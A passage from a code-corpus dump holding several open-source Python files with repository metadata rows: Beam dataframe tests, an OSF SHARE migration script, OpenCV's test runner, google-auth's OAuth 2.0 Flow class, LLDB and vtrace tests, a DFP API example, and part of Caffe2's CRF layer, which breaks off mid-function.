        # DataframeTransform accepts single PCollections, tuples, and dicts on
        # both the input and output sides; exercise each combination.
        one_series = pd.Series([1])
        two_series = pd.Series([2])
        three_series = pd.Series([3])
        proxy = one_series[:0]

        def equal_to_series(expected):
            def check(actual):
                actual = pd.concat(actual)
                if not expected.equals(actual):
                    raise AssertionError(
                        'Series not equal: \n%s\n%s\n' % (expected, actual))

            return check

        with beam.Pipeline() as p:
            one = p | 'One' >> beam.Create([one_series])
            two = p | 'Two' >> beam.Create([two_series])

            assert_that(
                one | 'PcollInPcollOut' >> transforms.DataframeTransform(
                    lambda x: 3 * x, proxy=proxy, yield_elements='pandas'),
                equal_to_series(three_series),
                label='CheckPcollInPcollOut')

            assert_that(
                (one, two)
                | 'TupleIn' >> transforms.DataframeTransform(
                    lambda x, y: (x + y), (proxy, proxy), yield_elements='pandas'),
                equal_to_series(three_series),
                label='CheckTupleIn')

            assert_that(
                dict(x=one, y=two)
                | 'DictIn' >> transforms.DataframeTransform(
                    lambda x,
                    y: (x + y),
                    proxy=dict(x=proxy, y=proxy),
                    yield_elements='pandas'),
                equal_to_series(three_series),
                label='CheckDictIn')

            double, triple = one | 'TupleOut' >> transforms.DataframeTransform(
                lambda x: (2*x, 3*x), proxy, yield_elements='pandas')
            assert_that(double, equal_to_series(two_series), 'CheckTupleOut0')
            assert_that(triple, equal_to_series(three_series), 'CheckTupleOut1')

            res = one | 'DictOut' >> transforms.DataframeTransform(
                lambda x: {'res': 3 * x}, proxy, yield_elements='pandas')
            assert_that(res['res'], equal_to_series(three_series), 'CheckDictOut')

    def test_cat(self):
        # verify that cat works with a List[Series] since this is
        # missing from doctests
        df = pd.DataFrame({
            'one': ['A', 'B', 'C'],
            'two': ['BB', 'CC', 'A'],
            'three': ['CCC', 'AA', 'B'],
        })

        self.run_scenario(df, lambda df: df.two.str.cat([df.three], join='outer'))
        self.run_scenario(
            df, lambda df: df.one.str.cat([df.two, df.three], join='outer'))

    def test_repeat(self):
        # verify that repeat works with a Series since this is
        # missing from doctests
        df = pd.DataFrame({
            'strings': ['A', 'B', 'C', 'D', 'E'],
            'repeats': [3, 1, 4, 5, 2],
        })
        self.run_scenario(df, lambda df: df.strings.str.repeat(df.repeats))

    def test_rename(self):
        df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
        self.run_scenario(
            df, lambda df: df.rename(columns={'B': 'C'}, index={
                0: 2, 2: 0
            }))

        # errors='raise' on index relabeling requires a global check.
        with expressions.allow_non_parallel_operations():
            self.run_scenario(
                df,
                lambda df: df.rename(
                    columns={'B': 'C'}, index={
                        0: 2, 2: 0
                    }, errors='raise'))
class TransformPartsTest(unittest.TestCase):
    """Tests for internal pieces of DataframeTransform (partition rebatching)."""

    def test_rebatch(self):
        with beam.Pipeline() as p:
            sA = pd.Series(range(1000))
            sB = sA * sA
            pcA = p | 'CreatePCollA' >> beam.Create([('k0', sA[::3]),
                                                     ('k1', sA[1::3]),
                                                     ('k2', sA[2::3])])
            pcB = p | 'CreatePCollB' >> beam.Create([('k0', sB[::3]),
                                                     ('k1', sB[1::3]),
                                                     ('k2', sB[2::3])])
            input = {'A': pcA, 'B': pcB} | beam.CoGroupByKey()
            output = input | beam.ParDo(
                transforms._ReBatch(target_size=sA.memory_usage()))

            # There should be exactly two elements, as the target size will be
            # hit when 2/3 of pcA and 2/3 of pcB is seen, but not before.
            assert_that(output | beam.combiners.Count.Globally(), equal_to([2]))

            # Sanity check that we got all the right values.
            assert_that(
                output | beam.Map(lambda x: x['A'].sum())
                | 'SumA' >> beam.CombineGlobally(sum),
                equal_to([sA.sum()]),
                label='CheckValuesA')
            assert_that(
                output | beam.Map(lambda x: x['B'].sum())
                | 'SumB' >> beam.CombineGlobally(sum),
                equal_to([sB.sum()]),
                label='CheckValuesB')
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| lukecwik/incubator-beam | sdks/python/apache_beam/dataframe/transforms_test.py | Python | apache-2.0 | 14,277 |
""" Sends specified registrations to SHARE """
import argparse
import json
import logging
import django
django.setup()
from osf.models import AbstractNode
from scripts import utils as script_utils
from website import settings
from website.app import setup_django
from website.project.tasks import update_node_share
logger = logging.getLogger(__name__)
def migrate(registrations):
    """Send each registration in *registrations* (a list of GUID strings) to SHARE.

    Raises:
        RuntimeError: when the required SHARE settings are missing, or when a
            target id does not load as a registration.
    """
    # ``assert`` statements are stripped when Python runs with -O, so raise
    # explicitly to guarantee misconfiguration can never slip through.
    if not settings.SHARE_URL:
        raise RuntimeError('SHARE_URL must be set to migrate.')
    if not settings.SHARE_API_TOKEN:
        raise RuntimeError('SHARE_API_TOKEN must be set to migrate.')
    registrations_count = len(registrations)
    logger.info('Preparing to migrate {} registrations.'.format(registrations_count))
    # enumerate(..., 1) replaces the manual ``count += 1`` bookkeeping.
    for count, registration_id in enumerate(registrations, 1):
        logger.info('{}/{} - {}'.format(count, registrations_count, registration_id))
        registration = AbstractNode.load(registration_id)
        if registration.type != 'osf.registration':
            raise RuntimeError('{} is not a registration.'.format(registration_id))
        update_node_share(registration)
        logger.info('Registration {} was sent to SHARE.'.format(registration_id))
def main():
    """Parse CLI arguments, set up logging/Django, and push registrations to SHARE."""
    parser = argparse.ArgumentParser(
        # BUG FIX: the description was copy-pasted from a preprint-provider
        # script; this script sends registrations to SHARE (see module docstring).
        description='Sends specified registrations to SHARE'
    )
    parser.add_argument(
        '--targets',
        action='store',
        dest='targets',
        help='List of targets, of form ["registration_id", ...]',
    )
    pargs = parser.parse_args()
    script_utils.add_file_logger(logger, __file__)
    setup_django()
    migrate(json.loads(pargs.targets))
if __name__ == '__main__':
    # Allow invocation as a standalone management script.
    main()
| pattisdr/osf.io | scripts/send_specific_registration_data_to_share.py | Python | apache-2.0 | 1,537 |
#!/usr/bin/env python
import datetime
from run_utils import *
class TestSuite(object):
    """
    Discovers the OpenCV test binaries for the current build (via the CMake
    cache wrapper) and runs them, collecting gtest XML logs.
    """

    def __init__(self, options, cache):
        # options: parsed CLI options; cache: CMake-cache introspection helper.
        self.options = options
        self.cache = cache
        # Test binaries are named like "opencv_<mode>_<module>".
        self.nameprefix = "opencv_" + self.options.mode + "_"
        self.tests = self.cache.gatherTests(self.nameprefix + "*", self.isTest)

    def getOS(self):
        # Prefer the live platform version; fall back to the cached OS name.
        return getPlatformVersion() or self.cache.getOS()

    def getHardware(self):
        res = []
        if self.cache.getArch() in ["x86", "x64"] and self.cache.withCuda():
            res.append("CUDA")
        return res

    def getLogName(self, app, timestamp):
        """Build the XML log file name for *app* run at *timestamp*."""
        app = self.getAlias(app)
        rev = self.cache.getGitVersion()
        if isinstance(timestamp, datetime.datetime):
            timestamp = timestamp.strftime("%Y%m%d-%H%M%S")
        if self.options.longname:
            # Verbose name: OS, arch, dependencies, hardware, SIMD features.
            small_pieces = [self.getOS(), self.cache.getArch()] + self.cache.getDependencies() + self.getHardware() + [self.cache.getSIMDFeatures()]
            big_pieces = [app, str(rev), timestamp, "_".join([p for p in small_pieces if p])]
            l = "__".join(big_pieces)
        else:
            # Compact name; squash characters that are awkward in file names.
            pieces = [app, self.cache.getOS(), self.cache.getArch()] + self.getHardware() + [rev, timestamp]
            lname = "_".join([p for p in pieces if p])
            lname = re.sub(r'[\(\)\[\]\s,]', '_', lname)
            l = re.sub(r'_+', '_', lname)
        return l + ".xml"

    def listTests(self, short = False, main = False):
        """Log the discovered tests (short aliases and/or main modules only)."""
        if len(self.tests) == 0:
            raise Err("No tests found")
        for t in self.tests:
            if short:
                t = self.getAlias(t)
            if not main or self.cache.isMainModule(t):
                log.info("%s", t)

    def getAlias(self, fname):
        # Shortest alias is the canonical one.
        return sorted(self.getAliases(fname), key = len)[0]

    def getAliases(self, fname):
        """Return every name the test binary *fname* may be referred to by."""
        def getCuts(fname, prefix):
            # filename w/o extension (opencv_test_core)
            noext = re.sub(r"\.(exe|apk)$", '', fname)
            # filename w/o prefix (core.exe)
            nopref = fname
            if fname.startswith(prefix):
                nopref = fname[len(prefix):]
            # filename w/o prefix and extension (core)
            noprefext = noext
            if noext.startswith(prefix):
                noprefext = noext[len(prefix):]
            return noext, nopref, noprefext
        # input is full path ('/home/.../bin/opencv_test_core') or 'java'
        res = [fname]
        fname = os.path.basename(fname)
        res.append(fname) # filename (opencv_test_core.exe)
        for s in getCuts(fname, self.nameprefix):
            res.append(s)
            if self.cache.build_type == "Debug" and "Visual Studio" in self.cache.cmake_generator:
                res.append(re.sub(r"d$", '', s)) # MSVC debug config, remove 'd' suffix
        log.debug("Aliases: %s", set(res))
        return set(res)

    def getTest(self, name):
        # return stored test name by provided alias
        for t in self.tests:
            if name in self.getAliases(t):
                return t
        raise Err("Can not find test: %s", name)

    def getTestList(self, white, black):
        """Resolve the tests to run: *white* (or all) minus blacklisted aliases."""
        res = [t for t in white or self.tests if self.getAlias(t) not in black]
        if len(res) == 0:
            raise Err("No tests found")
        return set(res)

    def isTest(self, fullpath):
        # 'java' is a pseudo-test driven through ant rather than a binary.
        if fullpath == "java":
            return True
        if not os.path.isfile(fullpath):
            return False
        if self.cache.getOS() == "nt" and not fullpath.endswith(".exe"):
            return False
        return os.access(fullpath, os.X_OK)

    def wrapInValgrind(self, cmd = []):
        """Prefix *cmd* with a valgrind invocation when requested via options."""
        if self.options.valgrind:
            res = ['valgrind']
            if self.options.valgrind_supp:
                res.append("--suppressions=%s" % self.options.valgrind_supp)
            res.extend(self.options.valgrind_opt)
            return res + cmd
        return cmd

    def runTest(self, path, logfile, workingDir, args = []):
        """Run one test binary; return (path-to-log-or-None, exit code)."""
        args = args[:]
        exe = os.path.abspath(path)
        if path == "java":
            # Java bindings are tested through the ant build.
            cmd = [self.cache.ant_executable, "-Dopencv.build.type=%s" % self.cache.build_type, "buildAndTest"]
            ret = execute(cmd, cwd = self.cache.java_test_binary_dir + "/.build")
            return None, ret
        else:
            if isColorEnabled(args):
                args.append("--gtest_color=yes")
            cmd = self.wrapInValgrind([exe] + args)
            # Give the test a private temp dir via OPENCV_TEMP_PATH.
            tempDir = TempEnvDir('OPENCV_TEMP_PATH', "__opencv_temp.")
            tempDir.init()
            log.warning("Run: %s" % " ".join(cmd))
            ret = execute(cmd, cwd = workingDir)
            tempDir.clean()
            hostlogpath = os.path.join(workingDir, logfile)
            if os.path.isfile(hostlogpath):
                return hostlogpath, ret
            return None, ret

    def checkPrerequisites(self):
        if self.cache.getArch() == "x64" and hostmachine == "x86":
            raise Err("Target architecture is incompatible with current platform")

    def runTests(self, tests, black, workingDir, args = []):
        """Run the selected tests; return (list of log paths, last nonzero exit code)."""
        self.checkPrerequisites()
        args = args[:]
        logs = []
        test_list = self.getTestList(tests, black)
        date = datetime.datetime.now()
        if len(test_list) != 1:
            # A user-supplied gtest_output path only makes sense for one test.
            args = [a for a in args if not a.startswith("--gtest_output=")]
        ret = 0
        for test in test_list:
            more_args = []
            exe = self.getTest(test)
            userlog = [a for a in args if a.startswith("--gtest_output=")]
            if len(userlog) == 0:
                logname = self.getLogName(exe, date)
                more_args.append("--gtest_output=xml:" + logname)
            else:
                logname = userlog[0][userlog[0].find(":")+1:]
            log.debug("Running the test: %s (%s) ==> %s in %s", exe, args + more_args, logname, workingDir)
            if self.options.dry_run:
                logfile, r = None, 0
            else:
                logfile, r = self.runTest(exe, logname, workingDir, args + more_args)
            log.debug("Test returned: %s ==> %s", r, logfile)
            if r != 0:
                ret = r
            if logfile:
                logs.append(os.path.relpath(logfile, workingDir))
        return logs, ret
#===================================================================================================
# Entry-point guard: this module is a library used by run.py, not a tool.
if __name__ == "__main__":
    log.error("This is utility file, please execute run.py script")
| DamianPilot382/Rubiks-Cube-Solver | opencv/sources/modules/ts/misc/run_suite.py | Python | apache-2.0 | 6,541 |
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 Authorization Flow
.. warning::
This module is experimental and is subject to change significantly
within major version releases.
This module provides integration with `requests-oauthlib`_ for running the
`OAuth 2.0 Authorization Flow`_ and acquiring user credentials.
Here's an example of using the flow with the installed application
authorization flow::
import google.oauth2.flow
# Create the flow using the client secrets file from the Google API
# Console.
flow = google.oauth2.flow.Flow.from_client_secrets_file(
'path/to/client_secrets.json',
scopes=['profile', 'email'],
redirect_uri='urn:ietf:wg:oauth:2.0:oob')
# Tell the user to go to the authorization URL.
auth_url, _ = flow.authorization_url(prompt='consent')
print('Please go to this URL: {}'.format(auth_url))
# The user will get an authorization code. This code is used to get the
# access token.
code = input('Enter the authorization code: ')
flow.fetch_token(code=code)
# You can use flow.credentials, or you can just get a requests session
# using flow.authorized_session.
session = flow.authorized_session()
print(session.get('https://www.googleapis.com/userinfo/v2/me').json())
.. _requests-oauthlib: http://requests-oauthlib.readthedocs.io/en/stable/
.. _OAuth 2.0 Authorization Flow:
https://tools.ietf.org/html/rfc6749#section-1.2
"""
import json
import google.auth.transport.requests
import google.oauth2.credentials
import google.oauth2.oauthlib
class Flow(object):
    """OAuth 2.0 Authorization Flow helper.

    All of the OAuth 2.0 mechanics are delegated to the
    :class:`requests_oauthlib.OAuth2Session` held in :attr:`oauth2session`;
    this class only adds convenience constructors and sane Google-specific
    defaults. Instances are typically built with
    :meth:`from_client_secrets_file` from a `client secrets file`_ obtained
    from the `Google API Console`_.

    .. _client secrets file:
        https://developers.google.com/identity/protocols/OAuth2WebServer
        #creatingcred
    .. _Google API Console:
        https://console.developers.google.com/apis/credentials
    """

    def __init__(self, oauth2session, client_type, client_config):
        """
        Args:
            oauth2session (requests_oauthlib.OAuth2Session): The OAuth 2.0
                session from ``requests-oauthlib``.
            client_type (str): The client type, either ``web`` or
                ``installed``.
            client_config (Mapping[str, Any]): The client configuration in
                the Google client secrets format.
        """
        # str: the client type, either 'web' or 'installed'.
        self.client_type = client_type
        # Mapping[str, Any]: the OAuth 2.0 client configuration for that type.
        self.client_config = client_config[client_type]
        # requests_oauthlib.OAuth2Session: does all of the real OAuth work.
        self.oauth2session = oauth2session

    @classmethod
    def from_client_config(cls, client_config, scopes, **kwargs):
        """Create a :class:`Flow` from an in-memory client configuration.

        Args:
            client_config (Mapping[str, Any]): Google-format client secrets
                mapping (must contain a ``web`` or ``installed`` key).
            scopes (Sequence[str]): The scopes to request during the flow.
            kwargs: Any additional parameters passed to
                :class:`requests_oauthlib.OAuth2Session`.

        Returns:
            Flow: The constructed Flow instance.

        Raises:
            ValueError: If the configuration is neither a web nor an
                installed app configuration.
        """
        client_type = next(
            (kind for kind in ('web', 'installed') if kind in client_config),
            None)
        if client_type is None:
            raise ValueError(
                'Client secrets must be for a web or installed app.')
        session, client_config = (
            google.oauth2.oauthlib.session_from_client_config(
                client_config, scopes, **kwargs))
        return cls(session, client_type, client_config)

    @classmethod
    def from_client_secrets_file(cls, client_secrets_file, scopes, **kwargs):
        """Create a :class:`Flow` from a Google client secrets file on disk.

        Args:
            client_secrets_file (str): Path to the client secrets .json file.
            scopes (Sequence[str]): The scopes to request during the flow.
            kwargs: Any additional parameters passed to
                :class:`requests_oauthlib.OAuth2Session`.

        Returns:
            Flow: The constructed Flow instance.
        """
        with open(client_secrets_file, 'r') as fh:
            config = json.load(fh)
        return cls.from_client_config(config, scopes=scopes, **kwargs)

    @property
    def redirect_uri(self):
        """The OAuth 2.0 redirect URI (proxied to the underlying session)."""
        return self.oauth2session.redirect_uri

    @redirect_uri.setter
    def redirect_uri(self, value):
        self.oauth2session.redirect_uri = value

    def authorization_url(self, **kwargs):
        """Generate the URL the user must visit to authorize this app.

        First step of the flow: redirect the user's browser to the returned
        URL. Delegates to
        :meth:`requests_oauthlib.OAuth2Session.authorization_url` using the
        client configuration's authorization URI.

        Args:
            kwargs: Additional arguments passed through to
                :meth:`requests_oauthlib.OAuth2Session.authorization_url`.

        Returns:
            Tuple[str, str]: The authorization URL and the opaque state
            token used to verify the authorization response. If a different
            :class:`Flow` instance completes the flow, construct it with
            this ``state``.
        """
        # 'offline' access is requested so that a refresh token is issued.
        return self.oauth2session.authorization_url(
            self.client_config['auth_uri'],
            access_type='offline', **kwargs)

    def fetch_token(self, **kwargs):
        """Complete the flow by exchanging the authorization response.

        Final step, called after the user consents. Delegates to
        :meth:`requests_oauthlib.OAuth2Session.fetch_token` using the client
        configuration's token URI.

        Args:
            kwargs: Arguments passed through to
                :meth:`requests_oauthlib.OAuth2Session.fetch_token`. At
                least one of ``code`` or ``authorization_response`` must be
                specified.

        Returns:
            Mapping[str, str]: The obtained tokens. Most callers ignore this
            and use :meth:`credentials` instead.
        """
        return self.oauth2session.fetch_token(
            self.client_config['token_uri'],
            client_secret=self.client_config['client_secret'],
            **kwargs)

    @property
    def credentials(self):
        """Credentials built from the OAuth 2.0 session.

        :meth:`fetch_token` must have been called first.

        Returns:
            google.oauth2.credentials.Credentials: The constructed
            credentials.

        Raises:
            ValueError: If there is no access token in the session.
        """
        return google.oauth2.oauthlib.credentials_from_session(
            self.oauth2session, self.client_config)

    def authorized_session(self):
        """Return a :class:`requests.Session` authorized with credentials.

        :meth:`fetch_token` must have been called first.

        Returns:
            google.auth.transport.requests.AuthorizedSession: The
            constructed session.
        """
        return google.auth.transport.requests.AuthorizedSession(
            self.credentials)
| axbaretto/beam | sdks/python/.tox/py27gcp/lib/python2.7/site-packages/google/oauth2/flow.py | Python | apache-2.0 | 9,887 |
"""
Test breakpoint command for different options.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class BreakpointOptionsTestCase(TestBase):
    """Exercises 'breakpoint set' options via scripted LLDB command sequences."""

    mydir = TestBase.compute_mydir(__file__)

    def test(self):
        """Test breakpoint command for different options."""
        self.build()
        self.breakpoint_options_test()

    def setUp(self):
        # Call super's setUp().
        TestBase.setUp(self)
        # Find the line number to break inside main().
        self.line = line_number('main.cpp', '// Set break point at this line.')

    def breakpoint_options_test(self):
        """Test breakpoint command for different options."""
        exe = self.getBuildArtifact("a.out")
        self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
        # This should create a breakpoint with 1 locations.
        # Two breakpoints on the same line, differing only in -K 1 vs -K 0 —
        # presumably toggling a boolean breakpoint option; TODO confirm the
        # exact semantics of -K against the lldb command reference.
        lldbutil.run_break_set_by_file_and_line(
            self,
            "main.cpp",
            self.line,
            extra_options="-K 1",
            num_expected_locations=1)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "main.cpp",
            self.line,
            extra_options="-K 0",
            num_expected_locations=1)
        # Run the program.
        self.runCmd("run", RUN_SUCCEEDED)
        # Stopped once.
        self.expect("thread backtrace", STOPPED_DUE_TO_BREAKPOINT,
                    substrs=["stop reason = breakpoint 2."])
        # Check the list of breakpoint.
        self.expect(
            "breakpoint list -f",
            "Breakpoint locations shown correctly",
            substrs=[
                "1: file = 'main.cpp', line = %d, exact_match = 0, locations = 1" %
                self.line,
                "2: file = 'main.cpp', line = %d, exact_match = 0, locations = 1" %
                self.line])
        # Continue the program, there should be another stop.
        self.runCmd("process continue")
        # Stopped again.
        self.expect("thread backtrace", STOPPED_DUE_TO_BREAKPOINT,
                    substrs=["stop reason = breakpoint 1."])
        # Continue the program, we should exit.
        self.runCmd("process continue")
        # We should exit.
        self.expect("process status", "Process exited successfully",
                    patterns=["^Process [0-9]+ exited with status = 0"])

    def breakpoint_options_language_test(self):
        """Test breakpoint command for language option."""
        # NOTE(review): nothing in this class calls this method and it lacks
        # the test_ prefix — confirm whether it is dead code before removing.
        exe = self.getBuildArtifact("a.out")
        self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
        # This should create a breakpoint with 1 locations.
        lldbutil.run_break_set_by_symbol(
            self,
            'ns::func',
            sym_exact=False,
            extra_options="-L c++",
            num_expected_locations=1)
        # This should create a breakpoint with 0 locations.
        lldbutil.run_break_set_by_symbol(
            self,
            'ns::func',
            sym_exact=False,
            extra_options="-L c",
            num_expected_locations=0)
        self.runCmd("settings set target.language c")
        lldbutil.run_break_set_by_symbol(
            self, 'ns::func', sym_exact=False, num_expected_locations=0)
        # Run the program.
        self.runCmd("run", RUN_SUCCEEDED)
        # Stopped once.
        self.expect("thread backtrace", STOPPED_DUE_TO_BREAKPOINT,
                    substrs=["stop reason = breakpoint 1."])
        # Continue the program, we should exit.
        self.runCmd("process continue")
        # We should exit.
        self.expect("process status", "Process exited successfully",
                    patterns=["^Process [0-9]+ exited with status = 0"])
| llvm-mirror/lldb | packages/Python/lldbsuite/test/functionalities/breakpoint/breakpoint_options/TestBreakpointOptions.py | Python | apache-2.0 | 3,765 |
import vtrace.tests as vt_tests
# Per-platform symbol names used as anchor points by the tests below; keys
# match the tracer's 'Platform' metadata value ('library.symbol' notation).
breakpoints = {
    'windows': 'ntdll.NtTerminateProcess',
    'linux': 'libc.exit',
    'freebsd': 'libc.exit',
}
class VtraceExpressionTest(vt_tests.VtraceProcessTest):
    """Exercises vtrace's expression parser against live symbol lookups."""

    def test_vtrace_sym(self):
        """Adding an offset to a qualified symbol must offset its address."""
        plat = self.trace.getMeta('Platform')
        symname = breakpoints.get(plat)
        entry = self.trace.parseExpression(symname)
        addEntry = self.trace.parseExpression(symname + " + 5")
        # assertEqual reports both values on failure, unlike assertTrue(a == b).
        self.assertEqual(entry + 5, addEntry)

    def test_baselib(self):
        """Adding an offset to a bare library name must offset its base."""
        plat = self.trace.getMeta('Platform')
        libname = breakpoints.get(plat).split('.')[0]
        entry = self.trace.parseExpression(libname)
        addEntry = self.trace.parseExpression(libname + " + 5")
        # TODO: grab a symbol in the library and compare offsets against that?
        self.assertEqual(entry + 5, addEntry)
| bat-serjo/vivisect | vtrace/tests/test_expressions.py | Python | apache-2.0 | 851 |
#!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all audience segments.
To create audience segments, run create_audience_segments.py.
"""
# Import appropriate modules from the client library.
from googleads import dfp
def main(client):
  """Print every audience segment visible to the given DFP client.

  Args:
    client: an initialized googleads.dfp.DfpClient.
  """
  # Bug fix: the original immediately re-created the client here via
  # LoadFromStorage(), silently ignoring the instance the caller passed in.
  # Initialize appropriate service.
  audience_segment_service = client.GetService(
      'AudienceSegmentService', version='v201411')

  # Create statement object to select all audience segments.
  statement = dfp.FilterStatement()

  # Get audience segments by statement, one page at a time.
  while True:
    response = audience_segment_service.getAudienceSegmentsByStatement(
        statement.ToStatement())
    if 'results' in response:
      # Display results.
      for segment in response['results']:
        print ('Audience segment with id \'%s\' and name '
               '\'%s\' of size %s was found.' %
               (segment['id'], segment['name'], segment['size']))
      statement.offset += dfp.SUGGESTED_PAGE_LIMIT
    else:
      break

  # Parenthesized single-argument print works identically on Python 2 and 3.
  print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
  # Initialize the client from stored credentials (googleads.yaml).
  dfp_client = dfp.DfpClient.LoadFromStorage()
  main(dfp_client)
| wubr2000/googleads-python-lib | examples/dfp/v201411/audience_segment_service/get_all_audience_segments.py | Python | apache-2.0 | 1,845 |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
## @package crf
# Module caffe2.python.crf
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core, recurrent, model_helper, brew
import numpy as np
'''
Due to a limitation in ReccurentNetworkOp, this layer only supports batch_size=1
In order to support batch_size > 1, we will have to implement the CRFUnit
and its gradient in C++ and handle the different batches there.
'''
class CRFWithLoss(object):
    """Linear-chain CRF layer with negative-log-likelihood loss.

    Builds the CRF score and loss on top of per-token class logits using a
    (num_classes + 2) x (num_classes + 2) transition matrix; the two extra
    rows/columns model the implicit BOS and EOS tags. See the module note:
    batch_size must be 1 due to a RecurrentNetworkOp limitation.
    """

    def __init__(self, model, num_classes, transitions_blob=None):
        # model: model_helper.ModelHelper the CRF operators are added to.
        # num_classes: number of real output classes (excluding BOS/EOS).
        # transitions_blob: optional pre-initialized transition matrix; a
        # uniform random one in [-1, 1] is created when omitted.
        self.model = model
        self.num_classes = num_classes
        self.num_classes_padded = num_classes + 2  # After adding BOS and EOS
        if not transitions_blob:
            transitions_blob = self.model.param_init_net.UniformFill(
                [],
                [core.ScopedBlobReference('crf_transitions')],
                shape=[self.num_classes_padded, self.num_classes_padded],
                min=-1.0,
                max=1.0
            )
        self.transitions = transitions_blob
        # Register transitions as a trainable parameter of the model.
        self.model.params.append(self.transitions)

    def crf_loss(self, predictions, labels, seq_lengths=None):
        """Return the CRF negative log-likelihood loss blob.

        predictions: per-token unary logits — assumed (seq_len, num_classes);
            TODO confirm against callers.
        labels: gold class ids for the sequence.
        seq_lengths: unused here; kept for interface compatibility.
        """
        # Since the transitions matrix is a shared parameter, need to
        # take a snapshot of it at the beginning since it can be updated
        # in between the operators that uses it when doing parallel updates
        transitions_snapshot = self.model.net.Copy(
            self.transitions, core.ScopedBlobReference('transitions_snapshot')
        )
        # Compute best path unary score from the logits
        path_unary_score = self._gather_entries_sum(
            predictions, labels, self.num_classes
        )
        # Append BOS and EOS entries to the predictions and labels
        predictions = self._pad_predictions(predictions)
        labels = self._pad_labels(labels)
        # Compute best path binary scores from the transitions matrix
        path_binary_score = self._path_binary_scores(
            labels, transitions_snapshot, seq_lengths
        )
        # Gold-path score = unary (emission) score + binary (transition) score.
        path_total_score = self.model.net.Add(
            [path_binary_score, path_unary_score],
            core.ScopedBlobReference('path_total')
        )
        # Compute all paths score
        zero_index = self.model.param_init_net.ConstantFill(
            [], shape=[1], value=0
        )
        # The first (BOS) row of the padded predictions seeds the recurrence.
        initial_state = self.model.net.Gather(
            [predictions, zero_index],
            core.ScopedBlobReference('rnn_initial'),
            dense_gradient=True
        )
        # Drop the BOS row; the remaining rows are the RNN inputs.
        input_data, _ = self.model.net.RemovePadding(
            [predictions],
            padding_width=1,
            end_padding_width=0,
            outputs=2,
        )
        # Insert a batch axis of size 1 (T x 1 x D), per the batch-size-1 limit.
        input_data = self.model.net.ExpandDims(
            [input_data],
            core.ScopedBlobReference('rnn_input_data'),
            dims=[1]
        )
        # Due to a bug in RecurrentNetworkGradientOp, we need to copy the
        # transitions blob before sending it to the recurrent network
        transitions_copy = self.model.net.Copy(
            transitions_snapshot, core.ScopedBlobReference('transitions_copy')
        )
        all_paths_scores = self._crf_forward(
            input_data, initial_state, transitions_copy
        )
        # NLL loss: log-partition (all paths) minus the gold-path score.
        loss = self.model.net.Sub(
            [all_paths_scores, path_total_score],
            core.ScopedBlobReference('crf_loss')
        )
        return loss

    def _pad_predictions(self, predictions):
        """Pad logits with BOS/EOS rows and columns."""
        # This function will introduce two labels for beginning of sequence
        # And end of sequence, it will make the necessary updates to the
        # the predictions blob
        low_score = -1000.0  # An arbitrary very low number
        # BOS row: only the BOS column (index num_classes) scores 0.
        b_scores = np.array(
            [[low_score] * self.num_classes + [0, low_score]]
        ).astype(np.float32)
        # EOS row: only the EOS column (index num_classes + 1) scores 0.
        e_scores = np.array(
            [[low_score] * self.num_classes + [low_score, 0]]
        ).astype(np.float32)
        b_scores = self.model.param_init_net.GivenTensorFill(
            [], "b_scores", shape=[1, self.num_classes_padded], values=b_scores
        )
        e_scores = self.model.param_init_net.GivenTensorFill(
            [], "e_scores", shape=[1, self.num_classes_padded], values=e_scores
        )
        zero_index = self.model.net.ConstantFill(
            [], shape=[1, ], value=0
        )
        # Sequence length read from the predictions' first shape dimension.
        length = self.model.net.Gather(
            [self.model.net.Shape([predictions]), zero_index],
        )
        length = self.model.net.Cast(length, to='int32')
        t_range = self.model.net.LengthsRangeFill(length)
        # Two low-score columns appended for the BOS/EOS classes.
        padding = self.model.net.ConstantFill([t_range], value=low_score)
        padding = self.model.net.ExpandDims(padding, dims=[1])
        padded_predictions, _ = self.model.net.Concat(
            [predictions, padding, padding],
            outputs=2,
            axis=1
        )
        # Prepend the BOS row and append the EOS row.
        padded_predictions_concat, _ = self.model.net.Concat(
            [b_scores, padded_predictions, e_scores],
            outputs=2,
            axis=0
        )
        return padded_predictions_concat

    def _pad_labels(self, labels):
        """Wrap the label sequence with the BOS and EOS class ids."""
        bos_i = self.num_classes
        eos_i = self.num_classes + 1
        bos_i_b = self.model.param_init_net.ConstantFill(
            [], shape=[1], value=bos_i
        )
        eos_i_b = self.model.param_init_net.ConstantFill(
            [], shape=[1], value=eos_i
        )
        labels = self.model.net.Cast([labels], to='int64')
        padded_labels, _ = self.model.net.Concat(
            [bos_i_b, labels, eos_i_b],
            axis=0,
            outputs=2
        )
        return padded_labels

    def _path_binary_scores(self, labels, transitions, seq_lengths=None):
        """Sum the transition scores along the gold label path."""
        # Successor tags: labels without the leading (BOS) entry.
        column_ids, _ = self.model.net.RemovePadding(
            [labels],
